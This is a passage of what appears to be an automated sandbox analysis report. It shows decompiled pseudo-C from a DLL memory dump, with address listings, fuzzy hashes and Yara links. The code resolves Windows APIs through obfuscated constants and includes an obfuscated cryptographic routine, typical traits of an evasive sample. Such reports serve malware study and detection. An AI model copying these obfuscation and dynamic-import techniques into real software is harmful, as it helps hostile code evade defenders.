									__eflags = _t147 - _t140 + _t38;
									if(_t147 < _t140 + _t38) {
										__eflags = 1;
										if(1 != 0) {
											_t98 =  *_t147;
											__eflags = _t98 - 0x2e;
											if(_t98 != 0x2e) {
												_t125 = 0;
												__eflags = 0;
												do {
													 *(_t156 + _t125 - 0x84) = _t98;
													_t98 =  *(_t147 + _t125 + 1) & 0x000000ff;
													_t125 = _t125 + 1;
													__eflags = _t98 - 0x2e;
												} while (_t98 != 0x2e);
											}
											_t44 = _t147 + 1; // 0x2
											_v20 = 0 + _t44;
											 *((short*)(_t156 + 0xffffffffffffff7c)) = 0x642e;
											_t100 = E6E4B8AE0(0x82efa8f);
											E6E4B8AE0(0x82efa8f);
											 *((char*)(_t156 + 0xffffffffffffff7e)) = 0x6c;
											E6E4B8AE0(0x82efa88);
											 *((char*)(_t156 + _t100 - 0x84)) = E6E4B27A0(0xe0);
											 *((char*)(_t156 + 0xffffffffffffff80)) = 0;
											_v24 = 0;
											_t105 = E6E4B94A0( *(0 + _t147 + 1) & 0x000000ff, 0x23);
											_t177 = _t172 + 0x18;
											__eflags = _t105 & 0x00000001;
											if((_t105 & 0x00000001) == 0) {
												_t152 = _v20;
											} else {
												_t110 = _v20[1];
												__eflags = _t110;
												if(_t110 == 0) {
													_t152 =  &_v24;
												} else {
													_t63 = _t147 + 3; // 0x4
													_t153 = 0 + _t63;
													do {
														_t111 = E6E4B8AE0(0x30866b89);
														E6E4B6CC0(__eflags, _t110, 0xffffffd0);
														_t113 = E6E4B2640(0, _v24 + _v24 + (_v24 + _v24) * 4);
														_t177 = _t177 + 0x14;
														_v24 = _t110 - _t111 - _t113 + 0x38a890d5;
														_t110 =  *_t153 & 0x000000ff;
														_t153 =  &(_t153[1]);
														__eflags = _t110;
													} while (_t110 != 0);
													_t152 =  &_v24;
												}
											}
											_t147 = GetProcAddress(LoadLibraryA( &_v136), _t152);
										}
									}
								}
							} else {
								goto L7;
							}
							goto L23;
							L7:
							_t137 = _t137 + 4;
							_t148 =  &(_v20[2]);
							_t114 = E6E4B2640(0, 1);
							_t164 = _t167 + 8;
							_t129 = _v36 - _t114;
						} while (_t129 <  *((intOrPtr*)(_v28 + 0x18)));
						_t147 = 0;
					}
				}
				L23:
				return _t147;
			}















































    0x6e4cf879
    0x6e4cf87c
    0x6e4cf87e
    0x6e4cf880
    0x6e4cf887
    0x6e4cf88c
    0x6e4cf88f
    0x6e4cf892
    0x6e4cf897
    0x6e4cf8a0
    0x6e4cf8a3
    0x6e4cf8cb
    0x6e4cf8cd
    0x6e4cf8d5
    0x6e4cf8ef
    0x6e4cf8f4
    0x6e4cf8f7
    0x6e4cf8f9
    0x6e4cf8fb
    0x6e4cf907
    0x6e4cf90b
    0x6e4cf90f
    0x6e4cf910
    0x6e4cf910
    0x6e4cf913
    0x6e4cf916
    0x6e4cf91d
    0x6e4cf928
    0x6e4cf92d
    0x6e4cf933
    0x6e4cf938
    0x6e4cf93a
    0x6e4cf93d
    0x6e4cf940
    0x6e4cf944
    0x6e4cf949
    0x6e4cf94c
    0x6e4cf953
    0x6e4cf958
    0x6e4cf959
    0x6e4cf940
    0x6e4cf95d
    0x6e4cf95f
    0x6e4cf966
    0x6e4cf96b
    0x6e4cf971
    0x6e4cf9b0
    0x6e4cf9c0
    0x6e4cf9de
    0x6e4cf9e4
    0x6e4cf9e7
    0x6e4cf9f4
    0x6e4cf9f9
    0x6e4cf9fc
    0x6e4cf9fe
    0x6e4cfa04
    0x6e4cfa09
    0x6e4cfa10
    0x6e4cfa12
    0x6e4cfa1a
    0x6e4cfa1c
    0x6e4cfa22
    0x6e4cfa26
    0x6e4cfa28
    0x6e4cfa2a
    0x6e4cfa2a
    0x6e4cfa30
    0x6e4cfa30
    0x6e4cfa37
    0x6e4cfa3c
    0x6e4cfa3d
    0x6e4cfa3d
    0x6e4cfa30
    0x6e4cfa41
    0x6e4cfa45
    0x6e4cfa48
    0x6e4cfa57
    0x6e4cfa68
    0x6e4cfa70
    0x6e4cfa7d
    0x6e4cfa92
    0x6e4cfa99
    0x6e4cfa9e
    0x6e4cfaad
    0x6e4cfab2
    0x6e4cfab5
    0x6e4cfab7
    0x6e4cfb18
    0x6e4cfab9
    0x6e4cfabf
    0x6e4cfac2
    0x6e4cfac4
    0x6e4cfb1d
    0x6e4cfac6
    0x6e4cfac6
    0x6e4cfac6
    0x6e4cfad0
    0x6e4cfae0
    0x6e4cfaed
    0x6e4cfaf8
    0x6e4cfafd
    0x6e4cfb08
    0x6e4cfb0b
    0x6e4cfb0e
    0x6e4cfb0f
    0x6e4cfb0f
    0x6e4cfb13
    0x6e4cfb13
    0x6e4cfac4
    0x6e4cfb34
    0x6e4cfb34
    0x6e4cfa1c
    0x6e4cfa12
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e4cf973
    0x6e4cf973
    0x6e4cf979
    0x6e4cf980
    0x6e4cf985
    0x6e4cf98b
    0x6e4cf990
    0x6e4cf999
    0x6e4cf999
    0x6e4cf897
    0x6e4cfb36
    0x6e4cfb3f

    APIs
    • LoadLibraryA.KERNEL32(0000642E), ref: 6E4CFB26
    • GetProcAddress.KERNEL32(00000000,?), ref: 6E4CFB2E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: .d$l
    • API String ID: 2574300362-2610669624
    • Opcode ID: 0f132fc2ddb29be5cad10d1709c7740e559182817a0f314552c4f2735866ebe1
    • Instruction ID: 228500356bddaee1db1068a84e12f4f4961b9e703e992e445815a175a40ee3fc
    • Opcode Fuzzy Hash: 0f132fc2ddb29be5cad10d1709c7740e559182817a0f314552c4f2735866ebe1
    • Instruction Fuzzy Hash: 17715ABAD002165BCF008EF4AC81FEE7BA9AF1525DF14046AED4967341EB359A05C7F2
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4C1D60, Relevance: 2.7, Strings: 2, Instructions: 181COMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E6E4C1D60(void* __ecx, void* __eflags, signed int _a4, signed int* _a8, signed int _a12) {
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed char _t63;
				signed int _t64;
				void* _t65;
				void* _t66;
				void* _t67;
				void* _t71;
				signed int _t72;
				signed char _t73;
				void* _t75;
				signed int _t79;
				signed char _t81;
				signed char _t85;
				signed int _t93;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t97;
				signed char _t99;
				signed int _t101;
				signed int _t102;
				signed int _t105;
				signed int _t109;
				signed int _t110;
				signed int* _t116;
				void* _t117;
				signed int _t118;
				void* _t119;
				signed int _t120;
				void* _t121;
				void* _t123;
				void* _t124;
				void* _t125;

				_t118 = _a4;
				do {
					_t93 =  *_t118;
					_t118 = _t118 + 1;
					_t63 = E6E4B4C00(E6E4C2940(__ecx, __eflags, _t93), 0);
					_t121 = _t121 + 0xc;
				} while ((_t63 & 0x00000001) == 0);
				if(_t93 == 0x2b) {
					_t64 = 0;
					__eflags = 0;
					goto L6;
				} else {
					_t64 = 1;
					if(_t93 == 0x2d) {
						L6:
						_v28 = _t64;
						_t93 =  *_t118;
						_t118 = _t118 + 1;
						__eflags = _t118;
					} else {
						_v28 = 0;
					}
				}
				_t65 = E6E4B27A0(0xbc);
				_t123 = _t121 + 4;
				if(( !_a12 | 0x00000010) != 0xffffffff || _t93 != _t65) {
					__eflags = _a12;
					_v24 = _a12 == 0;
					_t66 = E6E4B27A0(0xbc);
					_t123 = _t123 + 4;
					__eflags = _t93 - _t66;
					if(_t93 != _t66) {
						_t101 = _t93;
						_t67 = 0xa;
						_t94 = _a12;
						_t110 = _v24;
					} else {
						_t94 = _a12;
						_t110 = _v24;
						goto L15;
					}
					goto L16;
				} else {
					_t134 = ( *_t118 | 0x00000020) - 0x78;
					if(( *_t118 | 0x00000020) != 0x78) {
						_t94 = _a12;
						__eflags = _t94;
						_t16 = _t94 == 0;
						__eflags = _t16;
						_t110 = _t109 & 0xffffff00 | _t16;
						L15:
						_t67 = 8;
						_t101 = 0x30;
						L16:
						__eflags = _t110;
						_t95 =  !=  ? _t67 : _t94;
					} else {
						_t101 =  *(_t118 + 1);
						_t118 = _t118 + 2;
						_t95 = 0x10;
					}
				}
				_v32 = _t95;
				_v36 = 0xffffffff / _t95;
				_v40 = 0xffffffff % _t95;
				_v20 = 0;
				_t119 = _t118 - 1;
				_v24 = 0;
				while(1) {
					_t96 = _t101;
					_t71 = E6E4C0E90(_t134, _t101);
					_t124 = _t123 + 4;
					_t135 = _t71;
					if(_t71 == 0) {
						goto L22;
					}
					_t117 = _t96 - 0x30;
					E6E4B6CC0(_t135, _t96, E6E4B8AE0(0xf7d1055c));
					_t125 = _t124 + 0xc;
					L24:
					if(_t117 < _v32) {
						_t99 = (_t96 & 0xffffff00 | _v24 < 0x00000000) & 0xffffff00 | _v24 > 0x00000000;
						_t81 = E6E4B7600(_v20, _v36);
						_t123 = _t125 + 8;
						_v24 = 0xffffffff;
						if((_t81 & 0x00000001) != _t99 || (((_t81 ^ 0x00000001 | _t99) ^ 0x00000001) & 0x00000001) != 0) {
							L19:
							_t101 =  *((char*)(_t119 + 1));
							_t119 = _t119 + 1;
							_t134 = _t119;
							continue;
						} else {
							_t85 = E6E4B4C00(_v20, _v36);
							_t123 = _t123 + 8;
							if((_t85 & 0x00000001) == 0) {
								L18:
								_v20 = _v20 * _v32 + _t117;
								_v24 = 1;
								goto L19;
							} else {
								if(_t117 > _v40) {
									goto L19;
								} else {
									goto L18;
								}
							}
						}
					}
					L30:
					_t97 = _v24;
					__eflags = _t97;
					if(_t97 < 0) {
						_v20 = 0xffffffff;
					} else {
						_t75 = E6E4B2640(0, 0x7e3b8ccc);
						_t125 = _t125 + 8;
						_t102 = _v20;
						__eflags = _v28;
						_t78 =  ==  ? _t102 : _t75 - _t102 + 0x7e3b8ccc;
						_v20 =  ==  ? _t102 : _t75 - _t102 + 0x7e3b8ccc;
					}
					_t116 = _a8;
					_t73 = E6E4B6DF0(_t116, 0);
					__eflags = _t73 & 0x00000001;
					if((_t73 & 0x00000001) == 0) {
						__eflags = _t97;
						_t120 =  ==  ? _a4 : _t119;
						__eflags = _t120;
						 *_t116 = _t120;
					}
					return _v20;
					L22:
					_t72 = E6E4C09C0(__eflags, _t96);
					_t125 = _t124 + 4;
					__eflags = _t72;
					if(__eflags != 0) {
						_t79 = E6E4C5AB0(__eflags, _t96);
						_t125 = _t125 + 4;
						__eflags = _t79;
						_t105 = (0 | _t79 == 0x00000000) << 5;
						__eflags = _t105;
						_t117 = _t96 +  ~_t105 - 0x37;
						goto L24;
					}
					goto L30;
				}
			}









































    0x6e4c1d69
    0x6e4c1d70
    0x6e4c1d70
    0x6e4c1d73
    0x6e4c1d80
    0x6e4c1d85
    0x6e4c1d88
    0x6e4c1d8f
    0x6e4c1da4
    0x6e4c1da4
    0x00000000
    0x6e4c1d91
    0x6e4c1d91
    0x6e4c1d99
    0x6e4c1da6
    0x6e4c1da6
    0x6e4c1da9
    0x6e4c1dab
    0x6e4c1dab
    0x6e4c1d9b
    0x6e4c1d9b
    0x6e4c1d9b
    0x6e4c1d99
    0x6e4c1db9
    0x6e4c1dbe
    0x6e4c1dc4
    0x6e4c1de0
    0x6e4c1de4
    0x6e4c1ded
    0x6e4c1df2
    0x6e4c1df5
    0x6e4c1df7
    0x6e4c1e01
    0x6e4c1e04
    0x6e4c1e09
    0x6e4c1e0c
    0x6e4c1df9
    0x6e4c1df9
    0x6e4c1dfc
    0x00000000
    0x6e4c1dfc
    0x00000000
    0x6e4c1dca
    0x6e4c1dce
    0x6e4c1dd0
    0x6e4c1e11
    0x6e4c1e14
    0x6e4c1e16
    0x6e4c1e16
    0x6e4c1e16
    0x6e4c1e19
    0x6e4c1e19
    0x6e4c1e1e
    0x6e4c1e23
    0x6e4c1e23
    0x6e4c1e25
    0x6e4c1dd2
    0x6e4c1dd2
    0x6e4c1dd6
    0x6e4c1dd9
    0x6e4c1dd9
    0x6e4c1dd0
    0x6e4c1e2f
    0x6e4c1e34
    0x6e4c1e37
    0x6e4c1e3a
    0x6e4c1e41
    0x6e4c1e42
    0x6e4c1e68
    0x6e4c1e6c
    0x6e4c1e6e
    0x6e4c1e73
    0x6e4c1e76
    0x6e4c1e78
    0x00000000
    0x00000000
    0x6e4c1e7a
    0x6e4c1e8c
    0x6e4c1e91
    0x6e4c1ec6
    0x6e4c1ecb
    0x6e4c1ed4
    0x6e4c1edd
    0x6e4c1ee2
    0x6e4c1eec
    0x6e4c1ef3
    0x6e4c1e63
    0x6e4c1e63
    0x6e4c1e67
    0x6e4c1e67
    0x00000000
    0x6e4c1f07
    0x6e4c1f0d
    0x6e4c1f12
    0x6e4c1f17
    0x6e4c1e50
    0x6e4c1e59
    0x6e4c1e5c
    0x00000000
    0x6e4c1f1d
    0x6e4c1f20
    0x00000000
    0x6e4c1f26
    0x00000000
    0x6e4c1f26
    0x6e4c1f20
    0x6e4c1f17
    0x6e4c1ef3
    0x6e4c1f2b
    0x6e4c1f2b
    0x6e4c1f2e
    0x6e4c1f30
    0x6e4c1f57
    0x6e4c1f32
    0x6e4c1f39
    0x6e4c1f3e
    0x6e4c1f41
    0x6e4c1f4b
    0x6e4c1f4f
    0x6e4c1f52
    0x6e4c1f52
    0x6e4c1f5e
    0x6e4c1f64
    0x6e4c1f6c
    0x6e4c1f6e
    0x6e4c1f70
    0x6e4c1f72
    0x6e4c1f72
    0x6e4c1f76
    0x6e4c1f76
    0x6e4c1f82
    0x6e4c1ea0
    0x6e4c1ea1
    0x6e4c1ea6
    0x6e4c1ea9
    0x6e4c1eab
    0x6e4c1eae
    0x6e4c1eb3
    0x6e4c1eb8
    0x6e4c1ebd
    0x6e4c1ebd
    0x6e4c1ec2
    0x00000000
    0x6e4c1ec2
    0x00000000
    0x6e4c1eab

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.302014252.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
    • Associated: 00000000.00000002.302010138.000000006E4B0000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302065111.000000006E4D3000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.302071968.000000006E4D5000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.302078936.000000006E4D8000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: +$-
    • API String ID: 0-2137968064
    • Opcode ID: eb3fb39ec373ec46f71411f59fd2cdf12f452f93ac28192e97816e447721a499
    • Instruction ID: e1d616c4471800aebdc1f6550489c9cf95cf5f2835a4d4b6753371fcf30f1462
    • Opcode Fuzzy Hash: eb3fb39ec373ec46f71411f59fd2cdf12f452f93ac28192e97816e447721a499
    • Instruction Fuzzy Hash: 3851E8B9E002064BEF008EF89C91BEF77B8AF06718F45052BD855A7381D775951987A3
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E4CA000, Relevance: 2.1, Strings: 1, Instructions: 878COMMONCrypto
    Download Yara Rule
    C-Code - Quality: 92%
    			E6E4CA000(signed int __edx, void* __eflags, signed int* _a4, intOrPtr _a8, signed int* _a12, intOrPtr* _a16) {
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int* _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int* _v52;
				signed int _v56;
				intOrPtr* _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				signed int _v100;
				signed int _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v128;
				signed int _v132;
				signed int _v136;
				void* _t304;
				signed int _t305;
				signed int* _t306;
				void* _t308;
				void* _t313;
				void* _t317;
				signed int _t320;
				signed int _t327;
				void* _t328;
				signed int* _t331;
				signed int _t341;
				signed int _t348;
				void* _t349;
				void* _t358;
				void* _t359;
				intOrPtr _t366;
				intOrPtr _t367;
				signed int _t373;
				signed int _t377;
				void* _t387;
				void* _t390;
				signed int _t398;
				signed int _t407;
				intOrPtr* _t411;
				signed int _t413;
				signed int _t414;
				signed int _t421;
				signed char _t435;
				signed int _t437;
				void* _t442;
				void* _t443;
				signed int _t445;
				signed int _t450;
				signed int _t452;
				signed int _t455;
				signed int _t458;
				signed int _t460;
				signed int* _t465;
				intOrPtr _t467;
				signed int* _t468;
				intOrPtr _t469;
				signed int _t474;
				signed char _t475;
				signed int _t480;
				signed int _t481;
				intOrPtr _t484;
				signed int* _t489;
				signed int _t494;
				signed int _t503;
				signed int _t508;
				signed int _t509;
				signed int _t511;
				intOrPtr* _t513;
				signed int* _t514;
				signed int _t516;
				signed int _t517;
				intOrPtr* _t520;
				signed int _t521;
				signed int _t525;
				signed int _t526;
				signed int _t527;
				signed int _t530;
				signed int _t533;
				signed int _t536;
				signed int* _t537;
				signed int _t546;
				signed char _t549;
				signed int _t553;
				signed int _t554;
				intOrPtr* _t558;
				signed int _t559;
				signed int _t560;
				signed int _t563;
				signed int* _t565;
				signed int _t566;
				signed int _t569;
				intOrPtr* _t570;
				signed int _t573;
				signed int _t576;
				signed int _t580;
				signed int _t582;
				signed int _t583;
				signed int _t585;
				signed int _t588;
				signed int _t592;
				signed int _t593;
				signed int _t595;
				signed int* _t600;
				intOrPtr* _t604;
				signed int _t609;
				signed int* _t610;
				signed int _t611;
				void* _t613;
				signed int _t615;
				void* _t618;
				signed int* _t622;
				signed int* _t623;
				signed int _t626;
				signed int* _t631;
				intOrPtr _t632;
				signed int* _t634;
				signed int _t636;
				signed int _t637;
				void* _t641;
				void* _t643;
				void* _t646;
				void* _t651;
				void* _t655;
				void* _t675;
				void* _t685;
				void* _t687;
				void* _t688;
				void* _t689;
				void* _t695;

				_t553 = __edx;
				_t565 = _a12;
				_v40 = E6E4C9120();
				_t489 = E6E4C9120();
				_v88 = E6E4C9120();
				_v72 = E6E4C9120();
				_v52 = E6E4C9120();
				_t604 = E6E4C9120();
				_t304 = E6E4CCA50(_t303, __edx, __eflags, _t565, _a16);
				_t643 = _t641 - 0x78 + 8;
				if(_t304 == 0) {
					_t305 = E6E4C8CB0(_t565);
					_t643 = _t643 + 4;
					__eflags = _t305;
					if(_t305 == 0) {
						_t306 = _t565;
						_t520 = _a16;
						_t566 =  *_t520;
						__eflags = _t566 - 1;
						_v36 = _t489;
						_v60 = _t604;
						if(_t566 != 1) {
							_v20 =  *_t306;
							_t308 = E6E4B2640(0,  *_t306);
							_v68 = 1;
							E6E4B6CC0(__eflags, _v20, 1);
							_v24 = _a4[1];
							_v32 = 1;
							_v56 = _t566;
							_t313 = E6E4B8AE0(0xebd2701d);
							_t646 = _t643 + 0x14;
							_t569 = 1 - _t308 - _t566 - _t313 + 0xe3fc8a91;
							__eflags = _v24 - _t569;
							if(_v24 < _t569) {
								_t465 = _a4;
								_t634 = _t465;
								 *(_t465 + 4) = _t569;
								_t553 = _t569 << E6E4B8AE0(0x82efa8e);
								__eflags = _t553;
								_t467 = E6E4CD3B0( *((intOrPtr*)(_t634 + 8)), _t553);
								_t646 = _t646 + 0xc;
								 *((intOrPtr*)(_t634 + 8)) = _t467;
							}
							_v24 = _t569;
							E6E4BDAD0(_a12, _t489);
							_t570 = _v40;
							E6E4BDAD0(_a16, _t570);
							_v28 =  *((intOrPtr*)(_t570 + 8));
							_t317 = E6E4B8AE0(0xc15405c3);
							_t609 = E6E4B8AE0(0xc15405c3) +  *_t570 - _t317;
							E6E4B6CC0(__eflags,  *_t570, 0xffffffff);
							_t651 = _t646 + 0x20;
							_t320 = _v28;
							__eflags =  *(_t320 + _t609 * 4 - 4);
							if( *(_t320 + _t609 * 4 - 4) < 0) {
								_v64 = 0;
								goto L23;
							} else {
								_t560 = 0;
								__eflags = 0;
								_t546 = 1;
								_t513 = _v40;
								0;
								0;
								do {
									_v64 = (_t560 << 0x00000020 | _t546) << 1;
									_v68 = _t546 + _t546;
									E6E4C6740(_t546 + _t546, _t513, 0x6e4d501c);
									_t632 =  *((intOrPtr*)(_t513 + 8));
									_t458 = E6E4B6CC0(__eflags, 0 -  *_t513, E6E4B2640(0, 0xffffffff));
									_t560 = _v64;
									_t546 = _v68;
									_t651 = _t651 + 0x18;
									_t460 =  ~(_t458 << 2);
									__eflags =  *(_t632 + _t460);
								} while ( *(_t632 + _t460) >= 0);
								__eflags = _t546 | _t560;
								if((_t546 | _t560) == 0) {
									L23:
									_t610 = _v36;
									L24:
									_t573 =  *_t610;
									__eflags = _t573 - _v32;
									if(_t573 != _v32) {
										_t94 = _t573 + 0x63cafff; // 0x63cafff
										_t452 = E6E4B2640(_t94, E6E4B8AE0(0xe125572));
										_t651 = _t651 + 0xc;
										_t631 = _v36;
										 *_t631 = _t452;
										__eflags = _t573 - _t631[1];
										if(_t573 >= _t631[1]) {
											_t631[1] = _t452;
											__eflags = _t452 << E6E4B8AE0(0x82efa8e);
											_t455 = E6E4CD3B0(_t631[2], _t452 << E6E4B8AE0(0x82efa8e));
											_t651 = _t651 + 0xc;
											_t631[2] = _t455;
										}
										 *(_t631[2] + _v20 * 4) = 0;
									}
									_t574 = _v24;
									__eflags = _v24;
									_t611 = _v56;
									if(__eflags <= 0) {
										L52:
										_t327 = E6E4B2640( *_a12, E6E4B8AE0(0x4d5574d6)) -  *_a16;
										__eflags =  *(_a4[2] + 0x15ee3968 + _t327 * 4);
										_t264 = _t327 + 0x457b8e5a; // 0x457b8e5a
										_t613 = _t264;
										_t328 = E6E4B2640(0, 0 |  *(_a4[2] + 0x15ee3968 + _t327 * 4) != 0x00000000);
										E6E4B6CC0(__eflags, _t613,  *(_a4[2] + 0x15ee3968 + _t327 * 4) != 0);
										_t655 = _t651 + 0x1c;
										 *_a4 = _t613 - _t328;
										_t331 = _v36;
										_t615 =  *_t331;
										__eflags = _t615;
										if(_t615 <= 0) {
											_v24 = 0;
											L57:
											_t489 = _v36;
											 *_t489 = _v24;
											E6E4BDAD0(_t489, _a8);
											_t576 = _v40;
											L58:
											_t604 = _v60;
											L5:
											_push(_v88);
											E6E4BE2C0();
											_push(_v72);
											E6E4BE2C0();
											_push(_v52);
											E6E4BE2C0();
											_push(_t489);
											E6E4BE2C0();
											_push(_t576);
											E6E4BE2C0();
											_push(_t604);
											return E6E4BE2C0();
										}
										_v20 = _t331[2];
										_v24 = 0;
										_t494 = 0;
										__eflags = 0;
										0;
										0;
										do {
											_t341 = E6E4B2640(_t615, 1);
											_v28 = _t341;
											E6E4B6CC0(__eflags, _t615, 0xffffffff);
											_v48 =  *((intOrPtr*)(_v20 + _t341 * 4));
											_v44 = E6E4B3B80(0, _t494,  *((intOrPtr*)(_v20 + _t341 * 4)), 0);
											_v32 = _t553;
											_t580 = E6E4B3E10(0, _t494,  *((intOrPtr*)(_v20 + _t341 * 4)), 0) | _v44;
											E6E4BB3D0(__eflags, 0, _t494, _v48, 0);
											_t348 = E6E4C1B40(_t580, _t553 | _v32, _v68, _v64);
											__eflags = _t348;
											_t521 = _v24;
											_t616 =  ==  ? _t521 : _t615;
											__eflags = _t521;
											_t522 =  ==  ?  ==  ? _t521 : _t615 : _t521;
											_v24 =  ==  ?  ==  ? _t521 : _t615 : _t521;
											_t615 = _v28;
											 *(_v20 + _t615 * 4) = _t348;
											_t349 = E6E4B39E0(_t553, _t521, _t348, _t553, _v68, _v64);
											_t655 = _t655 + 0x50;
											__eflags = _t615;
											_t494 = _t580 - _t349;
										} while (_t615 > 0);
										goto L57;
									} else {
										_v120 = _t611 - 1;
										E6E4B6CC0(__eflags, _t611, 0xffffffff);
										_v116 = E6E4B6CC0(__eflags, E6E4B6CC0(__eflags, _t611, 0x381a4a88), 0xfffffffe) + 0xc7e5b578;
										_t525 = _t611 - E6E4B2640(0, 1);
										_v104 = _t525;
										_v100 = _t525 * 4;
										_t358 = E6E4B6CC0(__eflags, _v20, 0xaa94244d);
										_t359 = E6E4B8AE0(0xa2badec1);
										_v108 = E6E4B8AE0(0x8474d380) + _v20 - _t611 + 0x73a5d6f5;
										_t366 = E6E4B2640(0,  !_t611);
										_t675 = _t651 + 0x38;
										_v96 = _t366;
										_t367 = 0;
										_v112 = _t358 - _t611 - _t359 + 0xce847fe1;
										do {
											_v128 = _t367;
											_v124 = E6E4B2640(_v112, _t367) + 0x317b801f;
											_t526 = E6E4B6CC0(__eflags, _t574, 0xffffffff);
											_t582 = _v36[2];
											_v24 = _t526;
											_t126 = _t526 + 0x3c2de719; // 0x3c2de719
											_t373 = E6E4B6CC0(__eflags, _t126, _t611);
											_v32 = _t373;
											_t128 = _t373 - 0x3c2de719; // -1009641241
											_v20 =  *((intOrPtr*)(_t582 + 0xf48639c + _t373 * 4));
											_v48 = _t582;
											_v44 = _t128;
											_t377 = E6E4B2640(0, E6E4B2640(0, _t128) + 1);
											E6E4B6CC0(__eflags, _t128, 0xffffffff);
											_t554 =  *((intOrPtr*)(_t582 + _t377 * 4));
											_v80 = _t554;
											_t527 =  *((intOrPtr*)(_v40 + 8));
											_v84 = _t527;
											_v92 =  *((intOrPtr*)(_t527 + _v120 * 4));
											_t618 = E6E4C1B40(_t554, _v20,  *((intOrPtr*)(_t527 + _v120 * 4)), 0);
											_t583 = _t554;
											__eflags = _t618 - E6E4B2DD0(0xf7d10573, 0x7856dfe0);
											asm("sbb eax, edx");
											_t386 =  <  ? _t583 : 0;
											_v28 =  <  ? _t583 : 0;
											_t503 =  <  ? _t618 : 0xffffffff;
											_t387 = E6E4B39E0(_t554, _t618 - E6E4B2DD0(0xf7d10573, 0x7856dfe0), _t618, _t583, _v92, 0);
											_v76 = _t554;
											_t390 = E6E4B2860(_v80, _v20, 0x2cbd7a6e, 0x6f890398);
											_t585 = _v28;
											asm("sbb edx, [ebp-0x48]");
											_t621 = _t390 - _t387 - 0x2cbd7a6e;
											__eflags = _t390 - _t387 - 0x2cbd7a6e;
											asm("sbb edx, eax");
											_v76 = _t554;
											_v136 =  *((intOrPtr*)(_v84 + _v116 * 4));
											E6E4B6CC0(_t390 - _t387 - 0x2cbd7a6e, _v44, 0xfffffffe);
											_t685 = _t675 + 0x60;
											_v132 =  *((intOrPtr*)(_v48 + 0xf486394 + _v32 * 4));
											0;
											0;
											while(1) {
												_v28 = _t585;
												_v20 = _t503;
												_t398 = _t503;
												_t530 = _v136;
												_v32 = _t398 * _t530;
												_v48 = _t585 * _t530 + (_t398 * _t530 >> 0x20);
												_v44 = 0x491983;
												_t588 = _v132;
												_v80 =  !_t588;
												_v84 =  !0x674cc49;
												_t407 = E6E4B2DD0(0xe5a36c5, 0x781fc663);
												_t533 = _v84;
												E6E4BB3D0(__eflags, 0x674cc49, 0x491983, _t533, _v44);
												_t687 = _t685 + 0x18;
												__eflags = ((_t588 & _t533 | _t407 & _v80) ^ 0x0674cc49) - _v32;
												asm("sbb ebx, [ebp-0x2c]");
												if(((_t588 & _t533 | _t407 & _v80) ^ 0x0674cc49) >= _v32) {
													break;
												}
												_t503 = _v20 - 1;
												_t585 = _v28;
												asm("sbb edi, 0x0");
												_t559 = _v76;
												asm("sbb edx, eax");
												asm("adc edx, 0x0");
												_t450 = E6E4B2860(_t621 - 0xde9a9e80 + _v92, _t559, 0xde9a9e80, 0x7d6da7a3);
												_t685 = _t687 + 0x10;
												_t621 = _t450;
												_v76 = _t559;
												__eflags = _t559;
												if(_t559 == 0) {
													continue;
												}
												_v28 = _t585;
												_t535 = _v40;
												_t558 = _v60;
												_t622 = _v52;
												_t592 = _v56;
												L36:
												_t411 =  *((intOrPtr*)(_t558 + 8));
												_v20 = _t508;
												 *_t411 = _t508;
												_t509 = _v28;
												 *((intOrPtr*)(_t411 + 4)) = _t509;
												__eflags = _t509 - 1;
												asm("sbb eax, 0x0");
												 *_t558 = 2;
												_t413 = E6E4C0170(_t509 - 1, _v72, _t535, _t558);
												_t688 = _t687 + 0xc;
												_t202 =  &(_t622[1]); // 0x4ba4e856
												__eflags = _t592 -  *_t202;
												if(_t592 >=  *_t202) {
													_t622[1] = _v104;
													_t206 =  &(_t622[2]); // 0xc483ffff
													_t413 = E6E4CD3B0( *_t206, _v100);
													_t688 = _t688 + 8;
													_t622[2] = _t413;
												}
												__eflags = _t592;
												 *_t622 = 0;
												if(__eflags < 0) {
													L43:
													_t623 = _v52;
													_t414 = E6E4CCA50(_t413, _t558, __eflags, _t623, _v72);
													_t689 = _t688 + 8;
													__eflags = _t414;
													if(__eflags != 0) {
														E6E4C2110(_t623, _v40);
														_t437 = E6E4B6CC0(__eflags, _v20, 0xffffffff);
														_t689 = _t689 + 0x10;
														_v20 = _t437;
													}
													E6E4CAC60(_t535, _t623, _v72);
													_t651 = _t689 + 8;
													_t593 =  *_t623;
													__eflags = _t593;
													_t536 = _v24;
													if(_t593 <= 0) {
														L48:
														__eflags = _t593 - _v56;
														if(__eflags <= 0) {
															_t421 = E6E4B6CC0(__eflags,  ~_t593,  ~_v124);
															__eflags = _v96 - _t593 << 2;
															E6E4C9EE0(_v36[2] - (_t421 << 2), 0, _v96 - _t593 << 2);
															_t651 = _t651 + 0x14;
														}
														_t537 = _a4;
														_t574 = _v24;
														_t553 = _v20;
